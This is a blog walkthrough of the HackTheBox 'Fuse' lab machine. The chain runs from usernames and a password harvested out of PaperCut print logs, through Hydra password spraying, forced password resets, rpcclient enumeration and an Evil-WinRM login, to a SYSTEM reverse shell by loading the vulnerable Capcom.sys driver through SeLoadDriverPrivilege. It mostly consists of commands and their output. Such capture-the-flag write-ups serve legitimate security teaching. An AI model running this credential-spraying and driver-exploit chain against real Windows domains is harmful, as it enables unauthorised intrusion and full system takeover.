HackTheBox Fuse Writeup – 10.10.10.193

HackTheBox Fuse – 10.10.10.193 is a new Medium difficulty Windows box by egre55. It is the second Windows machine in a row released by HTB, after Blackfield (writeup here). My honest opinion is that the "Medium" difficulty rating is not fairly applied, as this box is much harder than the previous one, Blackfield. It needs at least a little programming knowledge, which most users lack.

Information Gathering

Let’s start with a port scan.

$ nmap -sC -sV -p- -oA fuse fuse.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 10:00 +03
Nmap scan report for fuse.htb (10.10.10.193)
Host is up (0.16s latency).
Not shown: 65514 filtered ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-17 07:25:55Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc        Microsoft Windows RPC
49672/tcp open  msrpc        Microsoft Windows RPC
49690/tcp open  msrpc        Microsoft Windows RPC
49751/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/17%Time=5EE9C162%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h37m41s, deviation: 4h02m30s, median: 17m40s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-06-17T00:28:16-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-17T07:28:18
|_  start_date: 2020-06-17T02:24:56

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 779.73 seconds

The Nmap scan shows a large number of open ports, which is normal when scanning Windows boxes. It also shows that the machine name is Fuse.fabricorp.local, that it belongs to the Active Directory domain fabricorp.local, and that the OS is Windows Server 2016 Standard 6.3. Kerberos (88), LDAP (389/636) and the global catalog ports (3268/3269) tell us this host is a domain controller.

Enumeration

As we can see, Microsoft IIS is running on port 80, so let us visit the hosted website and see what it is.

Visiting the default page redirects us to an internal address, http://fuse.fabricorp.local/papercut/logs/html/index.htm, which looks like a PaperCut print management application. However, the page does not open because the hostname does not resolve. Let us add the machine name to /etc/hosts and see what happens.

Ok, the right application, PaperCut Print Logger, loads after adding fuse.fabricorp.local to our hosts file.

The print logs in PaperCut contain a number of usernames and internal system names. There are two types of files, HTML and CSV, and the logs are split per day and per month. Let us download them and gather usernames first.

Downloaded CSVs:

Users:

$ cat usernames.txt
pmerton
tlavel
sthompson
bnielson
pmerton
bhult
administrator

SMB

SMB is open, but an anonymous login cannot list the shares; we need credentials.

$ smbclient -L fuse.htb
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

After spending some time on this, I decided to check whether the files I already had could contain passwords.

$ cat *.csv* | cut -d ',' -f2,5-7 |tr '.' '\n' |tr -d '"' | tr ',' '\n' | tee password.txt
PaperCut Print Logger - http://www
papercut
com/
User
Printer
Document Name
Client
pmerton
HP-MFT01
New Starter - bnielson - Notepad
JUMP01
tlavel
HP-MFT01
IT Budget Meeting Minutes - Notepad
LONWK015
sthompson
HP-MFT01
backup_tapes - Notepad
LONWK019
sthompson
HP-MFT01
mega_mountain_tape_request
pdf
LONWK019
sthompson
HP-MFT01
Fabricorp01
docx - Word
LONWK019
PaperCut Print Logger - http://www
papercut
com/
User
Printer
Document Name
Client
pmerton
HP-MFT01
New Starter - bnielson - Notepad
JUMP01
tlavel
HP-MFT01
IT Budget Meeting Minutes - Notepad
LONWK015
PaperCut Print Logger - http://www
papercut
com/
User
Printer
Document Name
Client
sthompson
HP-MFT01
backup_tapes - Notepad
LONWK019
sthompson
HP-MFT01
mega_mountain_tape_request
pdf
LONWK019
sthompson
HP-MFT01
Untitled - Notepad
FUSE
sthompson
HP-MFT01
Fabricorp01
docx - Word
LONWK019
User
Printer
Document Name
Client
pmerton
HP-MFT01
New Starter - bnielson - Notepad
JUMP01
tlavel
HP-MFT01
IT Budget Meeting Minutes - Notepad
LONWK015
sthompson
HP-MFT01
backup_tapes - Notepad
LONWK019
sthompson
HP-MFT01
mega_mountain_tape_request
pdf
LONWK019
sthompson
HP-MFT01
Fabricorp01
docx - Word
LONWK019
PaperCut Print Logger - http://www
papercut
com/
User
Printer
Document Name
Client
bhult
HP-MFT01
offsite_dr_invocation - Notepad
LAPTOP07
administrator
HP-MFT01
printing_issue_test - Notepad
FUSE
PaperCut Print Logger - http://www
papercut
com/
User
Printer
Document Name
Client
bhult
HP-MFT01
offsite_dr_invocation - Notepad
LAPTOP07
administrator
HP-MFT01
printing_issue_test - Notepad
FUSE

After removing duplicates and file extension names, I have the list ready for Hydra SMB brute forcing.
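The same extraction, as an added example that is not the author's pipeline: a small Python parser that reads the PaperCut CSV with the csv module, so the banner line, quoted fields and the " - Notepad" / " - Word" application suffixes are handled instead of splitting on every dot, and that performs the de-duplication and extension stripping described above. The sample CSV is constructed; only the User, Printer, Document Name and Client columns shown in this write-up are relied on, the remaining columns are an assumption.

```python
import csv
import io
import re

# Constructed sample in the PaperCut Print Logger CSV layout: a banner line,
# then a header row. Only the User, Printer, Document Name and Client columns
# shown in the write-up are relied on; the other columns are an assumption.
SAMPLE_CSV = """PaperCut Print Logger - http://www.papercut.com/
Time,User,Pages,Copies,Printer,Document Name,Client,Paper Size
"2020-05-28 10:01:23","pmerton","1","1","HP-MFT01","New Starter - bnielson - Notepad","JUMP01","A4"
"2020-05-28 11:15:02","sthompson","2","1","HP-MFT01","mega_mountain_tape_request.pdf","LONWK019","A4"
"2020-05-28 11:20:45","sthompson","1","1","HP-MFT01","Fabricorp01.docx - Word","LONWK019","A4"
"2020-05-29 09:00:10","bhult","1","1","HP-MFT01","offsite_dr_invocation - Notepad","LAPTOP07","A4"
"""

FIELDS = ("User", "Printer", "Document Name", "Client")
# Trailing application name PaperCut records from the window title (" - Notepad").
APP_SUFFIX = re.compile(r"\s+-\s+(Notepad|Word|Excel|PowerPoint|Adobe.*)$", re.I)
# File extensions that appear on document names and are not part of a password.
EXTENSION = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt)$", re.I)


def parse_papercut_csv(text):
    """Parse a PaperCut CSV export into row dicts keyed by header; the product
    banner on the first line is not CSV and is skipped."""
    lines = text.splitlines()
    if lines and lines[0].startswith("PaperCut Print Logger"):
        lines = lines[1:]
    return list(csv.DictReader(io.StringIO("\n".join(lines))))


def candidate_tokens(rows):
    """Unique values from the interesting columns, in first-seen order; titles
    are split on ' - ' and app suffix / file extension dropped (the manual clean-up)."""
    seen = []
    for row in rows:
        for field in FIELDS:
            value = APP_SUFFIX.sub("", (row.get(field) or "").strip())
            for part in value.split(" - "):
                part = EXTENSION.sub("", part.strip())
                if part and part not in seen:
                    seen.append(part)
    return seen


if __name__ == "__main__":
    for token in candidate_tokens(parse_papercut_csv(SAMPLE_CSV)):
        print(token)
```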

Within a few minutes, Hydra paired 3 users with the valid password Fabricorp01.

bhult:Fabricorp01
bnielson:Fabricorp01
tlavel:Fabricorp01

With valid credentials I proceeded to access SMB, but the session setup failed for all 3 users with the error NT_STATUS_PASSWORD_MUST_CHANGE.

$ smbclient -L fuse.htb -U tlavel 
Enter WORKGROUP\tlavel's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
-----------
$ smbclient -L fuse.htb -U bnielson
Enter WORKGROUP\bnielson's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
-----------
$ smbclient -L fuse.htb -U tlavel  
Enter WORKGROUP\tlavel's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

SMBPasswd

To access SMB I need to change the password first. As I recall, Samba has a utility called "smbpasswd" that can change a user's SMB password on a remote machine. Let us see whether I can change it before logging in.

The command goes like this:

smbpasswd [-a] [-c <config file>] [-x] [-d] [-e] [-D debuglevel] [-n] [-r <remote machine>] [-R <name resolve order>] [-m] [-U username[%password]] [-h] [-s] [-w pass] [-W] [-i] [-L] [username]

I first tried a simple password to save time, but the new password has to meet the domain's password policy.

$ smbpasswd -U bhult -r 10.10.10.193
Old SMB password:
New SMB password:
Retype new SMB password:
machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..

Using a complex password, I was able to set a new password for the user bhult and list the SMB shares.

$ smbpasswd -U bhult -r 10.10.10.193
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bhult on 10.10.10.193.
------------/snip/-------------
$ smbclient -L fuse.htb -U bhult    
Enter WORKGROUP\bhult's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HP-MFT01        Printer   HP-MFT01
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

While enumerating I noticed that the password resets after a certain period, probably a minute or so. I had to reset my password several times before I could fully enumerate things.

$ smbpasswd -U bnielson -r 10.10.10.193
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bnielson on 10.10.10.193.

# root @ nav1n in ~/htb/fuse [12:21:58] 
$ smbclient -L fuse.htb -U bnielson    
Enter WORKGROUP\bnielson's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HP-MFT01        Printer   HP-MFT01
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

I also noticed that the shares are the same for every user, so I decided to work with only one user; that way I do not need to change the password for everyone when it resets.

RPCClient

Now that I can authenticate, my next step is to list the domain users and look for a service account that I could try to exploit.

# root @ nav1n in ~/htb/fuse [12:34:48] 
$ rpcclient -U bnielson 10.10.10.193
Enter WORKGROUP\bnielson's password: 
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
rpcclient $> 

Enumerating Printers

The main goal of this machine is to exploit the printer to gain a foothold and carry it forward, so let us explore the printers in the domain using the RPC EnumPrinters command (enumprinters in rpcclient).

EnumPrinters revealed a new password, apparently for scan2docs. To find out which user it belongs to, I ran Hydra again and found that the two newly discovered service accounts, "svc-print" and "svc-scan", both match that credential.

Getting User

I tried to find a login page and to use SMB, but without success. Looking back at my earlier Enum4Linux results, I noticed that the user FABRICORP\svc-print is a member of the domain group FABRICORP\IT_Accounts and, to my surprise, IT_Accounts is part of the group "Remote Management Users". This means I can connect to the box as svc-print with that password over WinRM, using Evil-WinRM.

Evil-WinRM

As assumed, I successfully logged in to the system using Evil-WinRM and svc-print's password. The user flag was on the desktop and I grabbed it.

Privilege Escalation

As always, after getting a user shell, let us check the privileges of our current user.

The user svc-print holds a special privilege, "SeLoadDriverPrivilege", which allows the assigned user to load and unload device drivers. It is pretty normal for a user who manages printers to have this privilege. However, because drivers run in the kernel, granting it to a non-administrative account is a misconfiguration that leads to privilege escalation: the holder can load a signed but vulnerable driver and abuse it. There are plenty of PoCs that go from a low-privileged shell to Administrator by abusing this privilege. Defensively, the privilege should be held by administrators only, and HVCI or Microsoft's vulnerable driver blocklist prevents known-bad drivers such as Capcom.sys from loading at all.

If you search Google for "SeLoadDriverPrivilege Abuse", the first result, from tarlogic.com, shows how to abuse SeLoadDriverPrivilege to gain elevated privileges. As that article suggests, I am going to use Capcom.sys because it is a signed driver.

Let us start the rooting process. First, I need to obtain the following files and Git repos in order to build my own executables for the attack.

  1. Capcom.sys file: https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
  2. ExploitCapcom: https://github.com/tandasat/ExploitCapcom
  3. EoPLoaderDriver: https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp

Once I had all the files, I compiled ExploitCapcom with Visual Studio 2019 in x64 Release mode, which produced "ExploitCapcom.exe".

I also built a simple C++ executable, Reverse.exe, for my reverse connection.

Once I have everything, I upload the files into a temp directory and start my netcat listener in a separate terminal.

root@nav1n:~/htb/fuse # ruby evil-winrm.rb -i fuse.htb -u svc-print -p '$fab@s3Rv1ce$1'
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/18/2020   6:01 AM          10576 Capcom.sys
-a----        6/18/2020   5:59 AM          69632 ExploitCapcom.exe
-a----        6/18/2020   6:00 AM          38616 nc.exe
-a----        6/18/2020   6:00 AM          38400 Reverse.exe

With the required files in place and the listener running, I executed the driver loader from the temp directory, passing the registry key and the path to Capcom.sys. The key lives under the user's own HKCU hive (\Registry\User\<SID>\...), which is why a non-administrator can create it. The privilege was enabled and the vulnerable driver was loaded into the kernel successfully.

./ExploitCapcom.exe System\CurrentControlSet\fuser C:\temp\Capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\fuser
NTSTATUS: 00000000, WinError: 0

Exploiting

With the driver loaded, let us exploit it with the command below so that my listener receives the reverse connection.

.\ExploitCapcom.exe C:\temp\Reverse.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 000******
[*] Shellcode was placed at 0000*******
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed

And there it is: the listener receives a connection and I have a shell back as SYSTEM.

Ncat: Connection from 10.10.10.193.
Ncat: Connection from 10.10.10.193:5138.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

That is the end of the Fuse machine and of this HackTheBox Fuse writeup. Thank you for visiting and reading.



Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
